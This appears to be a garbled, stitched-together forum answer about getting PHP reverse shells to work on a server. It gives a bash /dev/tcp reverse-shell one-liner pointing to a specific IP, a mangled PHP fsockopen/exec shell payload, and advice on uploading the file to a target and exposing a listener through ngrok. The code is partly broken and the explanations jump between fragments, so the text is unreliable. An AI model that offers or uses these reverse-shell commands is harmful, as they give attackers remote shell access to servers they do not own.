To solve this, you need to add a command that will keep the process created by system running/alive. This is a module from Rapid7 that should be used with their handler but you don't have to. 1 Answer Sorted by: 1 The issue is once the command bash -c bash -i >& /dev/tcp/10.9.3.157/5555>&1 is executed the system function will exit which lead to kill the created bash process and the reverse shell. This will work with any operating system on a server.
I'm writing this on my phone and is a bit difficult to structure the text. Php reverse shell Using the exec() function: php -r sfsockopen(192.168.2.6,8080) exec(/bin/sh -i <&3 >&3 2>&3) Using the shellexec() function: php.Ask me if there is something that you dont understand. So if that other server (remote url) executes that php( you upload the file and open the url), you would need a public IP, because that server is on the internet and cannot find your physical ip. The file needs to be executed from the server that you want to conect to, so that the php in that system executes the bash command.
So the php is being executed in your server, not in another site. If your ip is in the same network as the server, (or your routing table is configured to forward to another network) the server tries to make the connection serverip->yourcomputerip:8080 So when you execute the php script, it runs on the server that hosts the file (localhost) and tries to connect to the desired ip.
So ngrok makes a localhost port public, like localhost:3000->, so at this point you have something like a public subdomain and a public ip that forwards the connections to your localhost.
0 kommentar(er)
